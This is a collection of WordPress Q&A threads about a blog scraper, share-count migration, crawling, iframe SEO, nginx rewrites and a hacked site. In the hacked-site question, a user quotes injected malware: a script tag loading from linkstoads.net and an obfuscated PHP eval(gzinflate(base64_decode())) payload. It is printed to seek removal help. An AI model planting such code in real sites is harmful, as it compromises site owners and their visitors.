How to prevent scraping my blog's updates? - wordpress

I have a self-hosted WordPress blog and, almost as expected, I found another blog scraping my content, posting a perfect copy of my posts (texts, images not hotlinked but fetched and re-uploaded to the clone's server, HTML layout within the posts) with a few hours of delay.
However, I must confess I'm infuriated to see that when I search Google for keywords relevant to my posts, the scraping clone always comes first.
So here I am, open to suggestions: how can I prevent my site from being successfully scraped?
Technical details:
The clone blog appears to be self-hosted, as am I; I'm on a Debian + Webmin + Virtualmin dedicated server.
My RSS feed is already cut halfway with a "read more on" link. I just thought I should publish a post dated something like 2001-01-01 and see if it appears on the clone blog; that would tell me whether my RSS feed is still used as the "hey, it's scraping time!" signal.
My logs can't isolate the scraper from legitimate traffic; either it's unidentifiable or it's lost in the flood of legitimate visits.
I have already banned the clone's .com domain in .htaccess and in iptables; my content gets cloned nonetheless.
The clone website uses reverse proxies, so I can't trace where it is hosted or which actual IPs should be blocked (well, unless I iptables-ban half of Europe to cover the whole IP ranges of its data center, but I'm slightly reluctant to do that!).
I'm confident this isn't hand-made; the cloning has been running for two years now, every day without fail.
Only my new posts are cloned, not the rest of my website (not the sidebars, not WordPress pages as opposed to WordPress posts, not the single pages), so setting up a jail.html and logging who opens it won't work; no honey-potting.
When my posts contain internal links pointing to another page of my website, the copies on the clone aren't rewritten and still point to my own website.
I'd love help and suggestions with this issue. Not with being cloned as such, but with losing traffic to that bot while I'm the original publisher.

You can't really stop them in the end, but you might be able to find them and mess with them. Try hiding the request IP in an HTML comment, in white-on-white text, or just somewhere out of the way, then see which IPs show up in the copies. You can also obfuscate that text by turning it into a hex string, or make it look like an error code, so someone who doesn't know what they're looking at won't catch on to what you're doing.
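For instance, a minimal WordPress sketch of that idea might look like the following (wp_footer is a standard hook; the rest is illustrative, and hex-encoding makes the address read like an innocuous build tag):
// Watermark every page with the requesting IP, hex-encoded so it
// looks like a build identifier rather than an address.
add_action('wp_footer', function () {
    $ip = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '';
    echo '<!-- build:' . bin2hex($ip) . ' -->';
});
When the comment surfaces on the clone, running the hex string through hex2bin() gives you back the address that fetched the page.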
In the end, though, I'm not sure how much it will buy you. If they're really inattentive, then rather than shutting them down and calling attention to the fact that you're onto them, you can feed them gibberish whenever one of their IPs crops up. That might be fun, and it's not too hard to make a gibberish generator by feeding sample text into a Markov chain.
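A toy version of that generator, sketched in PHP (a word-level chain; the function names are made up for illustration, and it assumes non-empty training text):
// Train a word-level Markov chain on sample text.
function markov_train($text) {
    $words = preg_split('/\s+/', trim($text));
    $chain = array();
    for ($i = 0; $i < count($words) - 1; $i++) {
        $chain[$words[$i]][] = $words[$i + 1];
    }
    return $chain;
}

// Walk the chain from a random start word to emit gibberish.
function markov_generate($chain, $length = 60) {
    $word = array_rand($chain);
    $out = array($word);
    for ($i = 0; $i < $length; $i++) {
        if (empty($chain[$word])) break;
        $word = $chain[$word][array_rand($chain[$word])];
        $out[] = $word;
    }
    return implode(' ', $out);
}
Train it on a few of your own posts and the output will look on-topic to a bot while reading as nonsense to a human.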
EDIT: Oh, and if the pages aren't rewritten too much, you might be able to add some inline JS to make them link back to you, if they don't strip that. Say, a banner that only shows up when the page isn't on your site, giving the original link to your article and suggesting that people read it there.
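Something along these lines might do it, assuming their pipeline keeps inline scripts and your permalink slugs (example.com stands in for your real domain):
// Ship a script with every page: invisible on your own domain, but a
// link back to the original when the page is served from anywhere else.
add_action('wp_footer', function () {
    ?>
    <script>
    (function () {
        if (location.hostname === 'example.com') return; // your real domain here
        var note = document.createElement('p');
        note.innerHTML = 'Originally published at <a href="http://example.com' +
            location.pathname + '">example.com</a>.';
        document.body.insertBefore(note, document.body.firstChild);
    })();
    </script>
    <?php
});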

Are you willing to shut down your RSS feed? If so, you could do something like this:
function fb_disable_feed() {
    wp_die( __('No feed available, please visit our homepage!') );
}
// Kill every flavor of feed WordPress serves.
add_action('do_feed', 'fb_disable_feed', 1);
add_action('do_feed_rdf', 'fb_disable_feed', 1);
add_action('do_feed_rss', 'fb_disable_feed', 1);
add_action('do_feed_rss2', 'fb_disable_feed', 1);
add_action('do_feed_atom', 'fb_disable_feed', 1);
This means that if you go to a feed page, it just returns the message in wp_die() on line two. We use it for "free" versions of our WP software, wrapped in an if-statement, so users can't hook into their RSS feeds to link to their main website; it's an upsell opportunity for us. It works well, is my point, haha.
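For what it's worth, the conditional wrapping looks roughly like this (is_free_version() is a made-up placeholder for whatever licensing check your plugin really performs):
// Only cut feeds off for unlicensed installs.
if (is_free_version()) {
    add_action('do_feed', 'fb_disable_feed', 1);
    add_action('do_feed_rdf', 'fb_disable_feed', 1);
    add_action('do_feed_rss', 'fb_disable_feed', 1);
    add_action('do_feed_rss2', 'fb_disable_feed', 1);
    add_action('do_feed_atom', 'fb_disable_feed', 1);
}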

Even though this post is a little old, I thought it would still be helpful to weigh in, in case other people find it with the same question. Since you've eliminated the RSS feed from the mix and you're pretty confident it isn't a manual effort, what you need to do is get better at stopping the bots they are using.
First, I would recommend banning proxy servers in your iptables rules. You can get a list of known proxy server addresses from MaxMind. This should limit their ability to anonymize themselves.
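If firewall-level blocking proves awkward, the same idea works as a crude application-level check; a sketch, where proxies.txt is a hypothetical one-address-per-line export of such a list:
// Reject any request whose source IP appears in a known-proxy list.
$proxies = @file('/etc/proxies.txt', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if ($proxies && in_array($_SERVER['REMOTE_ADDR'], $proxies, true)) {
    header('HTTP/1.1 403 Forbidden');
    exit;
}
For a list of any real size, you'd flip it into array keys once and test with isset() rather than scanning with in_array() on every request.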
Second, it helps to make the site harder to scrape. You could accomplish this in a couple of ways. You could render part, or all, of your site in JavaScript; if nothing else, you could at least render the links in JavaScript, which makes it significantly harder for them to scrape you. Alternatively, you can put your content inside an iframe within the pages, which also makes it somewhat harder to crawl and scrape.
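To sketch the link idea in a WordPress context (esc_attr() and esc_html() are real WordPress helpers; everything else here is illustrative):
// Print internal links as inert <span>s; a small script rebuilds them
// as real <a> tags in the browser, so scrapers that don't execute
// JavaScript never see a working href.
function js_link($url, $text) {
    printf('<span class="js-link" data-href="%s">%s</span>',
        esc_attr($url), esc_html($text));
}

add_action('wp_footer', function () {
    ?>
    <script>
    document.querySelectorAll('.js-link').forEach(function (el) {
        var a = document.createElement('a');
        a.href = el.dataset.href;
        a.textContent = el.textContent;
        el.replaceWith(a);
    });
    </script>
    <?php
});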
All that said, if they really want your content, they will get past these traps fairly easily. Honestly, fighting off web scrapers is an arms race: no static trap will stop them for good; you have to continuously evolve your tactics.
For full disclosure, I am a co-founder of Distil Networks, and we offer an anti-scraping solution as a service.

Related

Lost all my sharing stats by purchasing a domain

I lost all the likes on my WordPress website when I bought a domain. It is still the same site, but it no longer uses the wordpress.com address, just the .com (http://sobreasdeliciasdavida.com/).
Although my blog is recent, it already had good statistics, and the loss of more than 500 Facebook shares takes it back to its beginning.
Can you offer the option of importing the likes to the new domain, since the posts are the same?
Is there any way to do this?
Oftentimes when you move a well-established site, you'll want to set up a 301 redirect from the previous site. It's a permanent redirect that ensures people following links to your previous address end up at your new one. I should point out, though, that your blog is far from taken back to its beginning. Remember, content is king, and you now have a site that's totally under your control and already packed with great content: content that you know people respond to, like on social media, comment on, and so on. Don't worry about the 500 shares you might not get back, because you certainly have thousands more on the way if you just keep doing what you're doing.
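For reference, a 301 from a server you control is just a header; a minimal PHP sketch (on WordPress.com itself you'd buy their Site Redirect upgrade rather than write code):
// Permanently redirect every request on the old host to the same
// path on the new domain.
header('HTTP/1.1 301 Moved Permanently');
header('Location: http://sobreasdeliciasdavida.com' . $_SERVER['REQUEST_URI']);
exit;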
If you are directly using the Facebook code on your website, then you can check this out: http://searchenginewatch.com/sew/how-to/2172926/maintain-social-shares-site-migration

Retrieving relevant posts from Wordpress blogs

I have a requirement to write a program in Java that retrieves all the posts containing given keyword(s) from all WordPress sites.
This is how I approached the problem: I initially thought I would crawl WordPress sites looking for the keywords I'm interested in, but I realized that if there is an endpoint for WordPress search, it makes my job a lot easier. So I looked around for a search endpoint where I could submit queries and get back links to posts.
All I found is http://en.search.wordpress.com. I can still tweak the URL and get some links. But:
I'd like to know if there is a better way to handle this problem.
The search link I posted is meant for users, and it might be limiting my results since I query it from a program.
Also, I'd like to retrieve posts from a given date range; I'm not sure that is possible with my approach.
I'd appreciate any help in this regard. Thank you.
How about this approach:
Assuming you don't need to go back through the history and scrape all the old data, I would just stick to tags:
http://en.wordpress.com/tags/
I would crawl it every day, get the most popular tags (by font size), and then for each tag get the articles published in the past 24 hours.
For each post, get all the comments and search them for your keywords. A rough sketch of that loop follows.
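In rough PHP (the question calls for Java, but the shape is the same), with the caveat that the tag-page markup and the per-tag feed URLs are assumptions about wordpress.com's structure that you should verify first:
// Daily pass: scrape tag slugs from the tag cloud, then scan each
// tag's recent feed items for the keyword.
$html = file_get_contents('http://en.wordpress.com/tags/');
preg_match_all('#/tag/([^/"]+)/#', $html, $matches);
foreach (array_unique($matches[1]) as $tag) {
    $feed = @simplexml_load_file("http://en.wordpress.com/tag/{$tag}/feed/");
    if (!$feed) continue;
    foreach ($feed->channel->item as $item) {
        if (stripos((string) $item->description, 'my keyword') !== false) {
            echo $item->link, "\n";
        }
    }
}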
Would that work? If not, please share more details.
Good luck

Web crawlers and IFrames

Hypothetical situation: I have a small, obscure website called "miniatureBoltsInCarburetors.com" which provides content about the miniature bolts that hold a carburetor together, as well as some general automotive information. My site also has a single page that lets someone find the missing bolt in their carburetor, and while no one accesses this page directly from my website, a billion other popular automotive sites have embedded this single page in their websites using an iframe, without including a link back to my site.
I recognize that this question is related to SEO, which is considered off topic, but all of the many SEO forums discuss the marketing steps one could take, not the programming steps or strategies, so I hope this question can be answered here.
I want my site "miniatureBoltsInCarburetors.com" to rank high for general automotive searches. What could I do to make the third-party sites that embed my page in an iframe improve my ranking? Could using JavaScript in the iframe to create a link on the parent page provide any value? What about having my server, when it renders the page, use PHP to read the referring URL from $_SERVER and include it in the content?
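On that last PHP idea, the sketch is short; just bear in mind the Referer header is optional and often stripped, so it's best-effort at most:
// Credit the embedding page by name, based on the (unreliable)
// Referer header the browser sends with the iframe request.
$ref = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : '';
if ($ref !== '') {
    $host = parse_url($ref, PHP_URL_HOST);
    echo '<p>As seen on <a href="' . htmlspecialchars($ref) . '" rel="nofollow">'
        . htmlspecialchars($host) . '</a></p>';
}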
I am providing a solution here; I'm not sure if it's what you want, though.
In the page that other websites embed in an iframe, you can put the JavaScript below. It checks whether the page is opened inside an iframe or directly in the browser.
So when this check tells you the page is opened in an iframe, you can, on a click on something, navigate to your website.
// This works in all browsers.
function inIframe() {
    try {
        // Inside a frame, window.self and window.top are different objects.
        return window.self !== window.top;
    } catch (e) {
        // A cross-origin parent throws on access; that also means we're framed.
        return true;
    }
}
// Example use: if framed, offer a way back to the original site.
if (inIframe()) {
    document.body.insertAdjacentHTML('afterbegin',
        '<p><a href="http://miniatureBoltsInCarburetors.com/" target="_top">Use this tool on the original site</a></p>');
}
Also, for your reference, you can check the question below:
How to prevent my site page to be loaded via 3rd party site frame of iFrame
Hope it helps.
Iframes are seen as separate pages by Google, so your approach may end up being penalized as content sourced from an untrusted site. According to Google Webmaster Support:
"Frames can cause problems for search engines because they don't correspond to the conceptual model of the web. Google tries to associate framed content with the page containing the frames, but we don't guarantee that we will."
One of the best approaches to rank higher for a specific keyword is to make multiple related sites. In your case, a three-to-four-page site about carburetors, another about bolts, and others about the things your primary site contains would do it. These mini sites will be more focused on their subject because of the smaller page count. Of course, they should contain unique articles on each page. Then link from the mini sites to the primary site, and you can see the dramatic change.
In fact, the thing you are trying to do was a tactic occasionally used a few years ago to push competitors down in the rankings. Now, it is still a risk.
I see. You don't want to mess up the page for your own site, but you want to do something with all the uncredited embeddings.
The solution is fairly simple:
Create a copy of the page.
Switch your site to use the copy.
Amend the version that countless other sites are embedding so that there is a small link back to you, or add an iframe-blocker script that will load your site (see the sketch after these steps).
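That blocker can be a classic frame-buster served only on the embedded copy; a sketch:
// If this copy is framed by someone else's page, take over the
// top-level window and load the full site instead.
echo '<script>
if (window.top !== window.self) {
    window.top.location = "http://miniatureBoltsInCarburetors.com/";
}
</script>';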
If the page is interactive (i.e. the user works through it to find the missing bolt), you could include a sales message with the response, encouraging the user to visit your site.
I think your goal is to keep your link on these other sites long enough to get indexed by Google before the people doing the embedding notice it, so it's a bit of a balancing act.
I have seen conflicting advice about how Google indexes iframes. You could use a PageRank checker to see whether the existing iframe page URL has PageRank, and compare it to the pages that embed it.
I don't think you need to worry.
Googlebot does seem to crawl through iframes, but the web page containing the iframe is not credited for that content. In other words, the PageRank of that particular page does not change because of content pulled in through an iframe.
is IFrame crawled by Google?
Do robots crawl iframes?

A link to linkstoads.net in my WordPress blog, probably a virus. How do I get rid of it?

Recently (in the last two weeks) this line of code appeared in the footer of a WordPress blog:
<script type="text/javascript" src="http://linkstoads.net/keller/link.php?id=3" name="linkstats"></script>
I did not put it there. I have no idea what it does, but I want it out.
For my first attempt, I just replaced the template, and it was gone for a few minutes. But it came back.
So I went to my index.php file (not the template's, the very first index.php) and found this code:
#c3284d#
eval(gzinflate(base64_decode("JcxLDoMwDEXROVL3EHkBeMCsfLqRTKxgKYE0WLFVtbsvkOnRe5dDPBxMGmoSc/YTnj0Yfw03+lBjD05rOD2ayRMxp7KrHbRqX9hw55y53tpLlFda5+G8FHpfrTYmUw/LhC24wPjo/g==")));
#/c3284d#
So I removed it, but it came back again the next day.
How is that possible? I'm a newbie when it comes to viruses and security, so the answer may be really basic.
Congratulations! You have been hacked! Most likely you haven't updated your software in quite some time, and multiple attackers have exploited some well-known vulnerability in it.
How do you fix it? Scorched earth. You have been hacked by many bots, and access to your server has probably been sold on. Delete your entire web root and start from scratch, and make sure you have the latest versions of WordPress and every plugin.
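Before you wipe, it can be worth measuring how far the infection spread; a quick sketch that hunts for the injected marker (the '#c3284d#' string comes straight from the question) across a web root:
// Recursively list every file under the web root that carries the
// injected marker.
$iter = new RecursiveIteratorIterator(
    new RecursiveDirectoryIterator('/var/www', FilesystemIterator::SKIP_DOTS)
);
foreach ($iter as $file) {
    if ($file->isFile()
        && strpos(file_get_contents($file->getPathname()), '#c3284d#') !== false) {
        echo $file->getPathname(), "\n";
    }
}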
For the record, WordPress is by far one of the worst applications I have ever hacked. They are probably still using your password hash as the session ID, which means they don't even understand the basics of why you should hash passwords.
Oh, and if you keep getting hacked, hire a professional.
Problem solved: WordPress was not responsible for it.
There's a trojan that infects FileZilla, and when you open it, it injects code into every page it can reach through FileZilla.
This is really a big deal, and three antiviruses could not even find it.
If you see that, format your computer.

Using nginx rewrite to hide or clean URLs?

Greetings.
I've been trying to grok regexes and rewrites, but I'm a newbie at it. I have a simple site, one directory only; all I want is to rewrite domain.com/file.php?var=value to domain.com, making sure the user only ever sees domain.com in the address bar throughout site navigation (even if I start making the site more complex).
Simply speaking, it's freezing the URL. If the site grows I'd rather take some "clean URL" approach, but I'm still at basic PHP, and I sense I'd have to RTFM on HTTP/1.1.
You can use an nginx rewrite rule like this:
rewrite ^([^.]*)$ /index.php last;
to send all requests that do not contain a "." to your index.php script. In your PHP script, explode the request URI to get the passed parameters, and then pull in the page you want:
# URL: /people/jack_wilson
$url_vars = explode('/', $_SERVER['REQUEST_URI']); # array('', 'people', 'jack_wilson')
$page = $url_vars[1];
if ($page == 'people') {
    $username = $url_vars[2];
    require('people.php'); # handle things from here
}
Typically this type of "clean" URL stuff is accomplished with a wrapper frame for the entire site: the browser shows the URL of that frame only, and the contents can be whatever.
But I actually don't recommend it, because the user may want to bookmark the "dirty" URL.
This type of URL obfuscation diminishes usability for advanced users.
Not to be a jerk, but I typically only see this type of URL obfuscation on "artsy" sites that care more about what their address bar looks like than about the usability of their site. Making your users happy via enhanced usability is a better long-term approach, IMHO.
I guess freezing the URL is driven by marketing desires, so here's the downside to that, from a marketing standpoint as well: your users won't be able to send a link to a page they liked to their friends via IM, email, or Facebook, so it actually decreases the appeal of your site even for the most clueless users.
I don't (knowledgeably) think it's safe to have PHP variables showing in the address bar (although they'd show in the status bar of some browsers anyway...). Ideally the user wouldn't know what the site is using behind the scenes; I'm configuring error pages for starters. And yes, for aesthetics as well. If I can rewrite to domain.com/foo/bar I'd be happy, assuming nginx would handle the "translation back to ugly URLs" if it got such a request, which I think it does with location directives. But having domain.com/file.php?var1=value&var2=value kind of annoys me; it makes me feel I'm exposing the site too much.
Frames are not recommended (especially because of search engines), and I'm trying to stick to XHTML 1.1 Strict (so far so good). If the content is well designed, easy to navigate, accessible regardless of browser choice, intuitive, etc., I guess I could live with cute URLs :)
I'd gladly grok through any RTFM material regarding good web design techniques, PHP, HTTP/1.1, and whatever made you go "Yeah! That's what I've been looking for!" at 4 AM.
Thanks :)
[If I understand this site right, this ought to be a reply to the original post, not to an answer... sorry]
You could also look into a PHP framework such as CodeIgniter, which will handle all of the PHP side of this for you:
http://codeigniter.com/
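A taste of what that buys you: clean-URL routing in CodeIgniter is a one-line rule (a sketch; the controller and method names are made up):
// application/config/routes.php
// Map domain.com/people/jack_wilson to the People controller's
// profile() method, passing the username along.
$route['people/(:any)'] = 'people/profile/$1';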
